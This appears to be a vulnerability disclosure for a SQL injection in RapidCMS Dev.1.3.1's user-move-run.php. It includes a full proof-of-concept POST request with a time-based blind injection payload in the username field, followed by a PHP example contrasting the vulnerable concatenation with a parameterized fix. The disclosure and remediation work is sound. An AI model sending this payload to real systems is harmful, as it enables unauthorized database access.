RapidCMS Dev.1.3.1 has a SQL injection vulnerability in /admin/user/user-move-run.php
RapidCMS Dev.1.3.1
https://github.com/OpenRapid/rapidcms
Parameters affected: username
POST /admin/user/user-move-run.php HTTP/1.1
Host: demo.com
Content-Length: 71
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://demo.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.112 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://demo.com/admin/user/user-move.php?username=admin
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: deviceid=1722062988348; xinhu_ca_rempass=0; t00ls=e54285de394c4207cd521213cebab040; t00ls_s=YTozOntzOjQ6InVzZXIiO3M6MjY6InBocCB8IHBocD8gfCBwaHRtbCB8IHNodG1sIjtzOjM6ImFsbCI7aTowO3M6MzoiaHRhIjtpOjE7fQ%3D%3D; Hm_lvt_f6f37dc3416ca514857b78d0b158037e=1723172185; csrf_358693=2df7a84f; SECKEY_ABVK=OwAgykiuZ90JyymTDay7TVxsu9K7i77SDQ1wYucKShE%3D; BMAP_SECKEY=zsabggfKizJ7RMP-whUACbv-8Y8e5RtMYzyqN6tgzDDcqlIgvjPYXLThdapgeYvMI5gtvLD423X1mOjreODpLfh2LBSqd-MfWUOnirBpX6X5MhDcI2h78cg9SCeZlworW5OtN5Li7126gdR5a9n2B0G1H09Eu9K-e5yMSsxdwbkojLGWbNKpJSNGySLmO3bA; lang=zh-cn; vision=rnd; device=desktop; theme=default; hideMenu=false; preExecutionID=3; executionTaskOrder=status%2Cid_desc; Hm_lvt_5964cd4b8810fcc73c98618d475213f6=1723680035; http304ok=1; qebak_loginlangid=1; csrf_f2b6b4=adc34ccd; downloading=null; storyModuleParam=0; storyProductParam=0; storyBranchParam=0; executionStoryOrder=order_desc; storyPreExecutionID=3; docSpaceParam=%7B%22type%22%3A%22execution%22%2C%22objectID%22%3A%223%22%2C%22libID%22%3A%227%22%2C%22moduleID%22%3A%220%22%2C%22browseType%22%3A%22%22%2C%22param%22%3A%220%22%7D; lastDocModule=0; lastProject=2; docFilesViewType=list; tab=doc; xinhu_ca_adminuser=admin; xinhu_mo_adminid=eg0el0gx0ttm0tut0et0mx0ml0ea0el0tuj0tuj0ee0tua0ew0mg09; user=Y4W4R2t0a9Wa46O0O0Oa; name=admin; admin=Y4W4R2t0a9Wa46O0O0Oa
Connection: keep-alive

username=' or if(length(database())>4,sleep(3),1)#&password=123456&sub=
The username parameter is taken directly from the POST body and concatenated into the SQL statement.
The statement is then executed via the mysqli_query() function.
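The concatenation pattern described above next to a parameterized form, as an added example (not RapidCMS source code). The `users` table, its columns, the username policy and the connection settings are hypothetical placeholders.

```php
<?php
declare(strict_types=1);

// Added example. The table `users`, its columns and the connection settings
// are hypothetical; they are not taken from the RapidCMS source.

mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT); // throw on DB errors

/** Vulnerable pattern described above: POST value concatenated into the SQL text. */
function find_user_concat(mysqli $db, string $username): ?array
{
    $sql = "SELECT id, username FROM users WHERE username = '" . $username . "'";
    $res = mysqli_query($db, $sql);   // input is parsed as part of the statement
    return $res->fetch_assoc() ?: null;
}

/** Hardened form: the SQL text is fixed and the value is sent as a bound parameter. */
function find_user_bound(mysqli $db, string $username): ?array
{
    // Allow-list check first (assumed username policy: 1-32 of letters, digits, _ . -).
    if (preg_match('/\A[A-Za-z0-9_.-]{1,32}\z/', $username) !== 1) {
        return null;
    }
    $stmt = $db->prepare('SELECT id, username FROM users WHERE username = ?');
    $stmt->bind_param('s', $username);   // value never becomes SQL syntax
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// Request handling for a POST endpoint like the one in this report.
if (PHP_SAPI !== 'cli' && $_SERVER['REQUEST_METHOD'] === 'POST') {
    $db = new mysqli('127.0.0.1', 'cms_user', 'change-me', 'cms'); // placeholders
    $db->set_charset('utf8mb4');
    $username = $_POST['username'] ?? '';
    // Reject array-valued parameters (username[]=...) before any lookup.
    $user = is_string($username) ? find_user_bound($db, $username) : null;
    if ($user === null) {
        http_response_code(400);
        exit('Invalid or unknown user');
    }
    echo 'Found user id ' . (int) $user['id'];
}
```

With the bound form, the quote, `#` comment marker and function calls in a submitted username are compared as literal characters, so the query returns no row instead of changing the statement.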